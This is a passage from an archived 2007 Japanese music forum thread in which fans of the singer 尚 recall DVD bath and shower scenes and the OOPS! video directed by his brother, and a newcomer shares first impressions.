一番安心して見れる。
ということは、大概のヒトの本能をくすぐるのかもw

350 :NO MUSIC NO NAME:2007/02/20(火) 00:36:38 ID:vJH+l/PH
うんうん、くすぐられる。
かなり微妙な感じで

351 :NO MUSIC NO NAME:2007/02/21(水) 01:26:09 ID:d+aYwW2A
何かのDVDで、チェのメンバーが7人でお風呂入ってる(腰にタオルは巻いているが)カットがあって、その尚タンの上半身はだかが忘れられない。

352 :NO MUSIC NO NAME:2007/02/21(水) 23:45:56 ID:IshfVu9s
尚タソの寝起きシャワーあと、ってのもあったよね。
どんなサービスだよ?と正直事務所のスタンスを疑ったw

353 :NO MUSIC NO NAME:2007/02/21(水) 23:53:22 ID:Gm2JqmY4
どちらも、兄が監督をしたOOPS!ではなかろうか。

354 :NO MUSIC NO NAME:2007/02/22(木) 20:05:17 ID:IObVaXZ0
>>353
確かそう。
「あんたは自分の弟をなんだと思ってるんだ」と突っ込んだ記憶w

355 :NO MUSIC NO NAME:2007/02/22(木) 21:01:49 ID:70M1ZA0o
あのお風呂シーンの兄、股間ヤバスw

356 :NO MUSIC NO NAME:2007/02/23(金) 01:04:55 ID:z615G3z7
尚ちゃんファン初心者です。
今日、「タイフーン・ツアー」のDVDを観て
22年前は、こんなに可愛い顔をしてたのか、と思いました。
今の尚ちゃんは、去年の「ナイナイ・サイズ」と
「ロンドン・ハーツ」で観ました。
男の色気を感じてクラクラ来てしまいました。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)